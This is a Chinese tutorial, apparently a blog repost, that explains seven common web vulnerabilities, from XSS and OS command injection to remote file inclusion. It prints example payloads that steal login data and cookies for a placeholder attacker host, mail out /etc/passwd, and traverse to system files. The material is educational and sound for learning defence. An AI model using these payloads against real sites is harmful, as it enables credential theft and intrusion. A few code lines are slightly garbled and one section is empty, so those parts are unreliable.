常见Web安全漏洞深入解析
1.XSS跨站脚本攻击
运行非法的HTML标签或JavaScript进行的一种攻击
产生场景😇
在动态生成HTML处发生:🥳
下面以编辑个人信息页面为例讲解跨站脚本攻击。下方界面显示了用户输入的个人信息内容。
确认界面按原样显示在编辑界面输入的字符串。此处输入带有山口一郎这样的HTML标签的字符串。
此时的确认界面上,浏览器会把用户输入的
<s>
解析成HTML标签,然后显示删除线
利用方法🥸
恶意获取用户等登录信息:🥺
下图网站通过地址栏中URI的查询字段指定ID,即相当于在表单内自动填写字符串的功能。而就在这个地方,隐藏着可执行跨站脚本攻击的漏洞
于是我们构造恶意的URL:
http://example.jp/login?ID="><script>var+f=document=>.getElementById("login");+f.action="http://hackr.jp/pwget";+f.method==>"get";</script><span+s="
当用户在表单内输入ID和密码之后,就会直接发送到攻击者的网站(也就是hackr.jp),导致个人登录信息被窃取
对用户Cookie的窃取攻击:🥹
为了方便使用,我们直接在hacker服务器上构建一个js文件用于攻击:
<scriptsrc=http://hackr.jp/xss.js></script>
该脚本内指定的http://hackr.jp/xss.js文件。即下面这段采用JavaScript编写的代码。
var content =escape(document.cookie);
document.write("<img src=http://hackr.jp/?");
document.write(content);
document.write(">");
在存在可跨站脚本攻击安全漏洞的Web应用上执行上面这段JavaScript程序,即可访问到该Web应用所处域名下的Cookie信息。然后这些信息会发送至攻击者的Web网站
2.SQL注入攻击
SQL注入是攻击者将SQL语句改变成开发者意想不到的形式以达到破坏结构的攻击。
搜索时利用恶意SQL:🤠
3.OS命令注入攻击
通过Web应用,执行非法的操作系统命令达到攻击的目的。只要在能调用Shell函数的地方就有存在被攻击的风险
下面以咨询表单的发送功能为例,讲解OS注入攻击。该功能可将用户的咨询邮件按已填写的对方邮箱地址发送过去。
下面摘选处理该表单内容的一部分核心代码。
my $adr = $q->param('mailaddress');open(MAIL,"¦ /usr/sbin/sendmail $adr");print MAIL "From: [email protected]\n";
攻击者将下面的值指定作为邮件地址。
;cat /etc/passwd ¦ mail [email protected]
程序接收该值,构成以下的命令组合。
¦ /usr/sbin/sendmail ;cat /etc/passwd ¦ mail [email protected]
攻击者的输入值中含有分号(
;
)。这个符号在OS命令中,会被解析为分隔多个执行命令的标记。
可见,sendmail命令执行被分隔后,接下去就会执行
cat /etc/passwd| mail [email protected]
这样的命令了。结果,含有Linux账户信息
/etc/passwd
的文件,就以邮件形式发送给了hack@example.jp
4.HTTP首部注入攻击
攻击者通过在响应首部字段内插入换行,添加任意响应首部或主体的一种攻击
如下所示,Web应用有时会把从外部接收到的数值,赋给响应首部字段Location和Set-Cookie。
Location: http://www.example.com/a.cgi?q=12345
Set-Cookie:UID=12345
*12345就是插入值
HTTP首部注入可能像这样,通过在某些响应首部字段需要处理输出值的地方,插入换行发动攻击。
下面我们以选定某个类别后即可跳转至各类别对应页面的功能为例,讲解HTTP首部注入攻击。该功能为每个类别都设定了一个类别ID值,一旦选定某类别,就会将该ID值反映在响应内的Location首部字段内,形如
Location:http://example.com/?cat=101
。令浏览器发生重定向跳转。
攻击者以下面的内容替代之前的类别ID后发送请求。
101%0D%0ASet-Cookie:+SID=123456789
其中,
%0D%0A
代表HTTP报文中的换行符,紧接着的是可强制将攻击者网站的会话ID设置成
SID=123456789
的
Set-Cookie
首部字段
HTTP响应截断攻击:🤡
HTTP响应截断攻击是用在HTTP首部注入的一种攻击。攻击顺序相同,但是要将两个
%0D%0A%0D%0A
并排插入字符串后发送。利用这两个连续的换行就可作出HTTP首部与主体分隔所需的空行了,这样就能显示伪造的主体,达到攻击目的。这样的攻击叫做HTTP响应截断攻击。
%0D%0A%0D%0A<HTML><HEAD><TITLE>之后,想要显示的网页内容 <!--
5.邮件首部注入攻击
Web应用中的邮件发送功能,攻击者通过向邮件首部To或Subject内任意添加非法内容发起的攻击。利用存在安全漏洞的Web网站,可对任意邮件地址发送广告邮件或病毒邮件
下面以Web页面中的咨询表单为例讲解邮件首部注入攻击。该功能可在表单内填入咨询者的邮件地址及咨询内容后,以邮件的形式发送给网站管理员。
例如:使用两个连续的换行符就有可能篡改邮件文本内容并发送
[email protected]%0D%0A%0D%0ATest Message
再以相同的方法,就有可能改写To和Subject等任意邮件首部,或向文本添加附件等动作
6.目录遍历攻击
目录遍历攻击是指对本无意公开的文件目录,通过非法截断其目录路径后,达成访问目的的一种攻击
通过Web应用对文件处理操作时,在由外部指定文件名的处理存在疏漏的情况下,用户可使用
.../
等相对路径定位到
/etc/passed
等敏感的绝对路径上,因此服务器上任意的文件或文件目录皆有可能被访问到。这样一来,就有可能非法浏览、篡改或删除Web服务器上的文件
例如:攻击者设置如下查询字段后发出请求
http://example.com/read.php?log=../../etc/passwd
7.远程文件包含漏洞
远程文件包含漏洞是指当部分脚本内容需要从其他文件读入时,攻击者利用指定外部服务器的URL充当依赖文件,让脚本读取之后,就可运行任意脚本的一种攻击
下面以include读入由查询字段指定文件的功能为例,讲解远程文件包含漏洞。该功能可通过以下查询字段形式指定文件名,并在脚本内的include语句处读入这个指定文件。
http://example.com/foo.php?mod=news.php
foo.php源码如下:
$modname=$_GET['mod'];include($modname);
攻击者指定如同下面形式的URL发出请求:
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=ls
版权归原作者 世界尽头与你 所有, 如有侵权,请联系我们删除。